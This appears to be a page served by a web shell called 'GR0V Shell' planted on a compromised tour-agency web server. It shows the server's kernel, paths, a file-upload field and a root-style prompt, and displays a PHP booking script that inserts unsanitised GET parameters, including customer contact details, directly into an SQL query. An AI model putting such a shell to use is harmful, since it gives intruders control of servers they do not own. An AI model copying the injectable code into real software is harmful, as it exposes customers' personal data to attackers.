? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/adminmobile/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/adminmobile/fitbooking.php

<?
	include ("connect.php"); 
	$tourname = $_GET['tourname'];
	$period = $_GET['period'];
	$person = $_GET['person'];
	$price = $_GET['price'];
	$bookingtime = $_GET['bookingtime'];
	$cname = $_GET['cname'];
	$ctel = $_GET['ctel'];
	$cemail = $_GET['cemail'];

	$bookingSQL = "INSERT INTO tbl_fit (tourname,period,person,price,bookingtime,cname,ctel,cemail,status) 
	VALUES ('$tourname','$period','$person','$price','$bookingtime','$cname','$ctel','$cemail','New')";
	//echo $bookingSQL;
	$objQuery = mysql_query($bookingSQL);
		
	echo "<br/><br/><br/><center>Thank You for Booking!!!<br/><br/>";
	
	
?>
	<script langauge="JavaScript">
		window.location='http://www.k-tcc.com/board/plugin/mobile/confirm.php';
	</script>

T1KUS90T
  root-grov@210.1.60.28:~$